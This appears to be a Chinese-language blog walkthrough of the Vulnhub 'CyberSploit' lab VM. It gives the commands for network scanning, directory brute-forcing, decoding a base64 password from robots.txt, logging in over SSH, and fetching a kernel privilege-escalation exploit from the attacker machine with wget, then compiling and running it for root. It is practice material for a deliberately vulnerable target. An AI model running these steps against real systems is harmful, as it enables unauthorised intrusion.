今天實踐的是vulnhub的cybersploit鏡像,
下載地址,https://download.vulnhub.com/cybersploit/cybersploit.ova,
還是只能用virtualbox導入,做地址掃描,
sudo netdiscover -r 192.168.0.0/24,有地址了,186就是,

再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.186,

有web服務,瀏覽器訪問http://192.168.0.186,
查看頁面源碼,獲取到用戶名itsskv,

做一下目錄暴破,dirb http://192.168.0.186,

瀏覽器訪問http://192.168.0.186/robots.txt,

在線對R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9做base64解碼,
獲取到密碼cybersploit{youtube.com/c/cybersploit},

ssh登錄靶機,ssh itsskv@192.168.0.186,id確認不是root,需要提權,

uname -a查看內核版本是3.13.0-32-generic,
從網上搜到本地提權的poc代碼,

下載到kali攻擊機,改名成37292.c,kali攻擊機上開啟http下載服務,
python2 -m SimpHTTPServer,
在靶機上進入tmp目錄,cd /tmp,
下載代碼文件,wget http://192.168.0.190:8000/37292.c,
編譯可執行文件,gcc 37292.c -o poc,
執行,./poc,id確認是root,

本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束。
云計算和網絡安全技術實踐
一顆小胡椒
一顆小胡椒
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
Bypass
LemonSec
HACK之道
云計算和網絡安全技術實踐
安全圈
安全圈